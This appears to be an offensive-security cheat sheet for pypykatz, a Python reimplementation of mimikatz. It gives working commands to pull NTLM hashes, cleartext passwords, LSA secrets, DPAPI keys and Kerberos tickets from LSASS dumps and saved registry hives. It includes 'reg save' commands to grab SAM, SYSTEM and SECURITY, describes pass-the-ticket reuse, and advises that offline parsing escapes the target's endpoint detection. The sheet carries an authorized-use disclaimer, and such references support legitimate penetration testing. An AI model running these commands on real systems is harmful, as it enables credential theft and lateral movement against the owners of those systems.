PYPYKATZ
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
OVERVIEW#
pypykatz is a pure-Python implementation of mimikatz. Its main strength is parsing credentials OFFLINE from LSASS dumps, registry hives, and other artifacts on any OS (no Windows needed). Ideal for analysing dumps pulled during an engagement. Authorized use only.
LSASS DUMP PARSING#
pypykatz lsa minidump lsass.dmp # Parse an LSASS minidump pypykatz lsa minidump lsass.dmp -o creds.txt # Save output pypykatz lsa minidump lsass.dmp --json # JSON output pypykatz lsa minidump lsass.dmp -g # Grep-friendly pypykatz lsa minidump *.dmp # Multiple dumps # Recovers: NTLM hashes, cleartext (wdigest), Kerberos tickets, DPAPI keys
REGISTRY HIVE PARSING (OFFLINE SECRETS)#
pypykatz registry --sam sam.hiv --system system.hiv pypykatz registry --security security.hiv --system system.hiv pypykatz registry ./system.hiv --sam ./sam.hiv --security ./security.hiv # Extract local account hashes, LSA secrets, cached domain creds # (hives grabbed via: reg save HKLM\SAM / SYSTEM / SECURITY)
LIVE (ON A WINDOWS HOST)#
pypykatz live lsa # Parse live LSASS (admin) pypykatz live registry # Live registry secrets pypykatz live dpapi # Live DPAPI
DPAPI DECRYPTION#
pypykatz dpapi ... # DPAPI blob decryption # Decrypt credential blobs, browser secrets, vaults once you have the # masterkey (from LSASS dump or domain backup key)
KERBEROS TICKETS#
pypykatz lsa minidump lsass.dmp -k ./tickets # Extract .kirbi tickets # Recovered TGT/TGS can be reused (pass-the-ticket) via Rubeus/impacket
REMOTE (VIA SMB)#
pypykatz smb ... # Some builds support # remote operations; NetExec/lsassy are the usual at-scale route
EXAMPLES#
# Parse a dump created remotely (e.g. via lsassy --dumppath / procdump) pypykatz lsa minidump lsass.dmp -g # Offline local-hash + LSA-secret recovery from saved hives reg save HKLM\SAM sam.hiv && reg save HKLM\SYSTEM system.hiv \ && reg save HKLM\SECURITY security.hiv pypykatz registry --sam sam.hiv --security security.hiv --system system.hiv # Extract Kerberos tickets from a dump for pass-the-ticket reuse pypykatz lsa minidump lsass.dmp -k ./tickets
NOTES#
- pypykatz shines OFFLINE: get the dump/hives out safely, parse on your own Linux box - no mimikatz.exe on the target, less host-side risk - Pairs with LSASSY (remote dump creation) and MIMIKATZ (on-host live) - Dumping LSASS on the target is the detectable step; parsing with pypykatz afterward is invisible to the target's EDR - Works cleanly on your NixOS box (pure Python) - no Windows tooling - Handling recovered cleartext/hashes must follow the engagement's data-handling rules for FS clients (store encrypted, destroy on close)